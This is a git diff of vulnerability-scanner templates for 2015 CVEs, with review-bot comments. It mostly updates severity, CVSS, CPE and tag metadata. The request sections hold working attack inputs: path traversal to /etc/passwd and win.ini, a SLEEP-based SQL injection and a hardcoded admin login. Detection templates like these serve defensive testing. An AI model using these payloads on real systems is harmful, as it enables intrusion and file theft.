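Review bot: `+ - https://www.exploit-db.com/exploits/36619/` duplicates the first entry of the reference list (`https://www.exploit-db.com/exploits/36619`, differing only in the trailing slash), so the sync adds an alias rather than a new source; drop the added line, or normalise trailing slashes before the tooling deduplicates references. The CVE-2015-4414 hunk shows the same pair already present from an earlier update, which suggests the dedupe compares strings verbatim.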
@@ -13,13 +13,18 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-2196 remediation: Fixed in version 1.4.14. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2015-2196 cwe-id: CWE-89 + epss-score: 0.0093 + cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:* metadata: max-request: 1 verified: true + framework: wordpress + vendor: web-dorado + product: spider_calendar tags: wordpress,wp,sqli,cve2015,wpscan,wp-plugin,spider-event-calendar,unauth,edb,cve http: diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index 0b3cabc99d..23c9e7585f 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -11,14 +11,20 @@ info: - http://packetstormsecurity.com/files/131155/WordPress-Google-Map-Travel-3.4-XSS-CSRF.html - http://packetstormsecurity.com/files/130960/WordPress-AB-Google-Map-Travel-CSRF-XSS.html - https://nvd.nist.gov/vuln/detail/https://nvd.nist.gov/vuln/detail/CVE-2015-2755 + - https://wordpress.org/plugins/ab-google-map-travel/changelog/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2015-2755 - cwe-id: CWE-79 + cwe-id: CWE-352 + epss-score: 0.02569 + cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 verified: true + framework: wordpress + vendor: ab_google_map_travel_project + product: ab_google_map_travel tags: cve2015,xss,wordpress,wp-plugin,wp,ab-map,packetstorm,cve http: @@ -29,7 +35,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | @timeout: 10s POST /wp-admin/admin.php?page=ab_map_options HTTP/1.1 
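Review bot: In the CVE-2015-2755 hunk `- cwe-id: CWE-79` / `+ cwe-id: CWE-352` reclassifies the finding as cross-site request forgery, while the `tags:` line a few lines below still lists only `xss` and the packetstorm references in the same hunk describe both issues; the CWE and the tags a user filters on should not disagree. If the classification is taken from NVD, add a tag for the CSRF class alongside `xss` in the same change, or keep `CWE-79` if the template is meant to exercise only the reflected-script half.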
diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index f7487d37a1..76c4827d40 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -10,14 +10,20 @@ info: - https://security.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ - https://wordpress.org/plugins/navis-documentcloud/changelog/ - https://nvd.nist.gov/vuln/detail/CVE-2015-2807 + - https://wpvulndb.com/vulnerabilities/8164 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-2807 cwe-id: CWE-79 + epss-score: 0.00535 + cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/navis-documentcloud" + framework: wordpress + vendor: documentcloud + product: navis_documentcloud tags: cve,cve2015,wordpress,wp-plugin,xss http: @@ -28,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index e4d9ac8971..770188294b 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -11,13 +11,17 @@ info: - http://www.kb.cert.org/vuls/id/919604 - https://nvd.nist.gov/vuln/detail/CVE-2015-2863 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2015-2863 cwe-id: CWE-601 - tags: cve,cve2015,redirect,kaseya + epss-score: 0.00626 + cpe: cpe:2.3:a:kaseya:virtual_system_administrator:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: kaseya + product: virtual_system_administrator + tags: cve,cve2015,redirect,kaseya http: - method: GET diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index a5a52148df..4a464ad160 100644 --- a/http/cves/2015/CVE-2015-2996.yaml 
+++ b/http/cves/2015/CVE-2015-2996.yaml @@ -12,13 +12,17 @@ info: - http://seclists.org/fulldisclosure/2015/Jun/8 - https://nvd.nist.gov/vuln/detail/CVE-2015-2996 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C + cvss-score: 8.5 cve-id: CVE-2015-2996 cwe-id: CWE-22 + epss-score: 0.77754 + cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.favicon.hash:1540720428 + vendor: sysaid + product: sysaid tags: cve,cve2015,sysaid,lfi,seclists http: @@ -28,6 +32,7 @@ http: - "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd" stop-at-first-match: true + matchers-condition: and matchers: - type: regex diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index 9cb879ccc7..f94d264073 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -11,15 +11,20 @@ info: - https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150410-0_TP-Link_Unauthenticated_local_file_disclosure_vulnerability_v10.txt - http://www.tp-link.com/en/download/TL-WDR3600_V1.html#Firmware - https://nvd.nist.gov/vuln/detail/CVE-2015-3035 + - http://www.tp-link.com/en/download/Archer-C5_V1.20.html#Firmware classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N + cvss-score: 7.8 cve-id: CVE-2015-3035 cwe-id: CWE-22 + epss-score: 0.58993 + cpe: cpe:2.3:o:tp-link:tl-wr841n_\(9.0\)_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"TP-LINK" verified: true + vendor: tp-link + product: tl-wr841n_\(9.0\)_firmware tags: router,lfi,seclists,cve,cve2015,tplink,kev http: diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index dfc630774c..18ead65f29 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml 
@@ -3,21 +3,26 @@ id: CVE-2015-3224 info: name: Ruby on Rails Web Console - Remote Code Execution author: pdteam - severity: critical + severity: medium description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb. reference: - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/ - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/ - https://hackerone.com/reports/44513 - https://nvd.nist.gov/vuln/detail/CVE-2015-3224 + - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/160881.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-3224 cwe-id: CWE-284 - tags: ruby,hackerone,cve,cve2015,rce,rails + epss-score: 0.93656 + cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: rubyonrails + product: web_console + tags: ruby,hackerone,cve,cve2015,rce,rails,intrusive http: - method: GET @@ -39,8 +44,8 @@ http: - type: word part: response words: - - "X-Web-Console-Session-Id" - - "data-remote-path=" - - "data-session-id=" + - X-Web-Console-Session-Id + - data-remote-path= + - data-session-id= case-insensitive: true condition: or diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index b34a1d19dc..4c31fc255f 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml 
@@ -3,22 +3,26 @@ id: CVE-2015-3337 info: name: Elasticsearch - Local File Inclusion author: pdteam - severity: high + severity: medium description: Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled. reference: - https://www.exploit-db.com/exploits/37054/ - - http://web.archive.org/web/20210121084446/https://www.securityfocus.com/archive/1/535385 - https://www.elastic.co/community/security - http://www.debian.org/security/2015/dsa-3241 - https://nvd.nist.gov/vuln/detail/CVE-2015-3337 + - http://packetstormsecurity.com/files/131646/Elasticsearch-Directory-Traversal.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2015-3337 cwe-id: CWE-22 - tags: edb,cve,cve2015,elastic,lfi,elasticsearch,plugin + epss-score: 0.96596 + cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: elasticsearch + product: elasticsearch + tags: packetstorm,edb,cve,cve2015,elastic,lfi,elasticsearch,plugin http: - method: GET @@ -28,9 +32,9 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index ebf754310c..e3098e998d 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -7,7 +7,6 @@ info: description: ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. reference: - https://vulners.com/cve/CVE-2015-3648/ - - http://web.archive.org/web/20210122163815/https://www.securityfocus.com/bid/75019/ - http://svn.montala.com/websvn/revision.php?repname=ResourceSpace&path=%2F&rev=6640&peg=6738 - http://packetstormsecurity.com/files/132142/ResourceSpace-7.1.6513-Local-File-Inclusion.html - https://nvd.nist.gov/vuln/detail/CVE-2015-3648 
@@ -16,9 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2015-3648 cwe-id: CWE-22 - tags: lfi,resourcespace,packetstorm,cve,cve2015 + epss-score: 0.02644 + cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: montala + product: resourcespace + tags: lfi,resourcespace,packetstorm,cve,cve2015 http: - method: GET @@ -27,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 8d57066dac..3eecd182e4 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -3,7 +3,7 @@ id: CVE-2015-3897 info: name: Bonita BPM Portal <6.5.3 - Local File Inclusion author: 0x_Akoko - severity: high + severity: medium description: Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource. reference: - https://packetstormsecurity.com/files/132237/Bonita-BPM-6.5.1-Directory-Traversal-Open-Redirect.html @@ -11,13 +11,17 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-3897 - https://www.htbridge.com/advisory/HTB23259 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2015-3897 cwe-id: CWE-22 - tags: unauth,packetstorm,cve,cve2015,bonita,lfi + epss-score: 0.88702 + cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: bonitasoft + product: bonita_bpm_portal + tags: unauth,packetstorm,cve,cve2015,bonita,lfi http: - method: GET @@ -26,6 +30,7 @@ http: - "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini" stop-at-first-match: true + matchers-condition: or matchers: - type: word 
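Review bot: `+ matchers-condition: or` in the CVE-2015-3897 hunk is correct only if every entry of the matcher list that follows is a content match (one for the Linux probe, one for the Windows one); the list is cut off after `- type: word` at the end of the hunk, so this cannot be verified from here, but if a `status` matcher is among them an unrelated 200 response on either path will now satisfy the template on its own. If that is the case, drop the status matcher (the word matchers already imply a successful response) or fold both file signatures into one `regex` matcher so `or` is no longer needed.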
diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index ed95ff2b40..bf5d521a22 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -3,21 +3,26 @@ id: CVE-2015-4050 info: name: Symfony - Authentication Bypass author: ELSFA7110,meme-lord - severity: high + severity: medium description: Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component. reference: - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access - http://symfony.com/blog/cve-2015-4050-esi-unauthorized-access - http://www.debian.org/security/2015/dsa-3276 - https://nvd.nist.gov/vuln/detail/CVE-2015-4050 + - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159513.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-4050 cwe-id: CWE-284 - tags: cve,cve2015,symfony,rce + epss-score: 0.00847 + cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: sensiolabs + product: symfony + tags: cve,cve2015,symfony,rce http: - method: GET @@ -27,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "PHP Credits" - part: body - type: status status: diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index dfd20bda0e..d9b753b1b6 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml 
@@ -3,7 +3,7 @@ id: CVE-2015-4062 info: name: WordPress NewStatPress 0.9.8 - SQL Injection author: r3Y3r53 - severity: critical + severity: medium description: | WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php. reference: @@ -11,16 +11,22 @@ info: - https://wordpress.org/plugins/newstatpress - http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2015-4062 + - https://wordpress.org/plugins/newstatpress/changelog/ remediation: | Update to plugin version 0.9.9 or latest. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:P/A:P + cvss-score: 6.5 cve-id: CVE-2015-4062 cwe-id: CWE-89 + epss-score: 0.03336 + cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 verified: true + framework: wordpress + vendor: newstatpress_project + product: newstatpress tags: authenticated,cve,sqli,wp-plugin,newstatpress,packetstorm,cve2015,wordpress,wp http: @@ -31,7 +37,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index e3b6946a87..da1dbe7d65 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml 
@@ -3,7 +3,7 @@ id: CVE-2015-4063 info: name: NewStatPress <0.9.9 - Cross-Site Scripting author: r3Y3r53 - severity: medium + severity: low description: | WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php. reference: @@ -11,15 +11,21 @@ info: - https://wordpress.org/plugins/newstatpress/ - http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2015-4063 + - https://wordpress.org/plugins/newstatpress/changelog/ remediation: Update to plugin version 0.9.9 or latest. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:N/I:P/A:N + cvss-score: 3.5 cve-id: CVE-2015-4063 - cwe-id: CWE-80 + cwe-id: CWE-79 + epss-score: 0.04125 + cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 verified: true + framework: wordpress + vendor: newstatpress_project + product: newstatpress tags: cve,cve2015,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm http: @@ -30,7 +36,6 @@ http: Content-Type: application/x-www-form-urlencoded log=admin&pwd=admin123&wp-submit=Log+In - - | GET /wp-admin/admin.php?where1=&searchsubmit=Buscar&page=nsp_search HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index 46a1273290..a93254e739 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml 
@@ -15,9 +15,14 @@ info: cvss-score: 7.5 cve-id: CVE-2015-4074 cwe-id: CWE-22 - tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin + epss-score: 0.00598 + cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\!:*:* metadata: max-request: 1 + framework: joomla\! + vendor: helpdesk_pro_project + product: helpdesk_pro + tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index d9e59174b6..7d0779267b 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -12,10 +12,18 @@ info: - https://wordpress.org/plugins/church-admin/changelog/ - https://nvd.nist.gov/vuln/detail/CVE-2015-4127 classification: + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2015-4127 - tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss + cwe-id: CWE-79 + epss-score: 0.0034 + cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: church_admin_project + product: church_admin + tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss http: - method: GET diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index 2ee42fcb33..a5114ca4a9 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml 
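Review bot: `+ framework: joomla\!` in the CVE-2015-4074 hunk copies the CPE formatted-string escape into a free-text metadata field; the backslash is correct inside `cpe:` (CPE 2.3 escapes `!`), but every other template in this change writes the bare name (`framework: wordpress`, `framework: magento_server`), so a filter on framework would have to match the literal `joomla\!` and still miss the `joomla` tag the template already uses. Strip CPE escaping when deriving `framework`, `vendor` and `product` (here `framework: joomla`); the CVE-2015-3035 hunk has the same leakage in `product: tl-wr841n_\(9.0\)_firmware`, where the escaped parentheses also survive into the metadata.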
@@ -3,21 +3,27 @@ id: CVE-2015-4414 info: name: WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal author: daffainfo - severity: high + severity: medium description: WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. reference: - https://www.exploit-db.com/exploits/37274 - https://nvd.nist.gov/vuln/detail/CVE-2015-4414 - https://www.exploit-db.com/exploits/37274/ - http://packetstormsecurity.com/files/132266/WordPress-SE-HTML5-Album-Audio-Player-1.1.0-Directory-Traversal.html + - https://wpvulndb.com/vulnerabilities/8032 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2015-4414 cwe-id: CWE-22 + epss-score: 0.10802 + cpe: cpe:2.3:a:se_html5_album_audio_player_project:se_html5_album_audio_player:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/se-html5-album-audio-player" + framework: wordpress + vendor: se_html5_album_audio_player_project + product: se_html5_album_audio_player tags: cve,cve2015,wordpress,wp-plugin,lfi,edb,packetstorm http: @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 8bb53cf4dd..26af7a5705 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml 
@@ -9,14 +9,20 @@ info: - https://www.exploit-db.com/exploits/37388 - https://nvd.nist.gov/vuln/detail/CVE-2015-4632 - https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/ + - https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408 + - https://koha-community.org/koha-3-14-16-released/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-4632 cwe-id: CWE-22 - tags: cve,cve2015,lfi,edb + epss-score: 0.05668 + cpe: cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: koha + product: koha + tags: cve,cve2015,lfi,edb http: - method: GET @@ -25,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index 6ceda69e3f..a7328d18c6 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml 
@@ -3,20 +3,26 @@ id: CVE-2015-4666 info: name: Xceedium Xsuite <=2.4.4.5 - Local File Inclusion author: 0x_Akoko - severity: high + severity: medium description: Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter. reference: - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt - http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html - https://nvd.nist.gov/vuln/detail/CVE-2015-4666 + - https://support.ca.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html + - https://www.exploit-db.com/exploits/37708/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2015-4666 cwe-id: CWE-22 - tags: xceedium,xsuite,lfi,packetstorm,cve,cve2015 + epss-score: 0.03324 + cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xceedium + product: xsuite + tags: xceedium,xsuite,lfi,packetstorm,cve,cve2015 http: - method: GET @@ -25,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index 59c3399f70..7d067dba7d 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml 
@@ -11,14 +11,19 @@ info: - https://vuldb.com/?id.107082 - https://www.exploit-db.com/exploits/37708/ - https://nvd.nist.gov/vuln/detail/CVE-2015-4668 + - https://support.ca.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2015-4668 cwe-id: CWE-601 - tags: cve,cve2015,redirect,xsuite,xceedium,edb + epss-score: 0.00397 + cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xceedium + product: xsuite + tags: cve,cve2015,redirect,xsuite,xceedium,edb http: - method: GET diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index ee63cf3545..51c99a77e6 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -10,14 +10,20 @@ info: - https://wpscan.com/vulnerability/8047 - https://nvd.nist.gov/vuln/detail/CVE-2015-4694 - http://www.vapid.dhs.org/advisory.php?v=126 + - https://wordpress.org/plugins/zip-attachments/changelog/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2015-4694 cwe-id: CWE-22 + epss-score: 0.01382 + cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/zip-attachments" + framework: wordpress + vendor: zip_attachments_project + product: zip_attachments tags: cve2015,wp-plugin,wpscan,lfi,wordpress,cve http: @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index c123772ed4..741931920d 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml 
@@ -10,14 +10,19 @@ info: - https://vuldb.com/?id.76181 - http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html - https://nvd.nist.gov/vul n/detail/CVE-2015-5354 + - https://www.exploit-db.com/exploits/37439/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-score: 5.8 cve-id: CVE-2015-5354 cwe-id: CWE-601 - tags: packetstorm,cve,cve2015,redirect,novius + epss-score: 0.00166 + cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: novius-os + product: novius_os + tags: packetstorm,cve,cve2015,redirect,novius http: - method: GET diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index a31c2f96fc..1170f49ccf 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -10,14 +10,20 @@ info: - https://wordpress.org/plugins/stageshow/changelog/ - http://seclists.org/fulldisclosure/2015/Jul/27 - https://nvd.nist.gov/vuln/detail/CVE-2015-5461 + - https://plugins.trac.wordpress.org/changeset/1165310/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N cvss-score: 6.4 cve-id: CVE-2015-5461 cwe-id: NVD-CWE-Other + epss-score: 0.0055 + cpe: cpe:2.3:a:stageshow_project:stageshow:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/stageshow/" + framework: wordpress + vendor: stageshow_project + product: stageshow tags: wpscan,seclists,redirect,cve,cve2015,wordpress,wp-plugin http: @@ -27,6 +33,6 @@ http: matchers: - type: regex + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - part: header diff --git 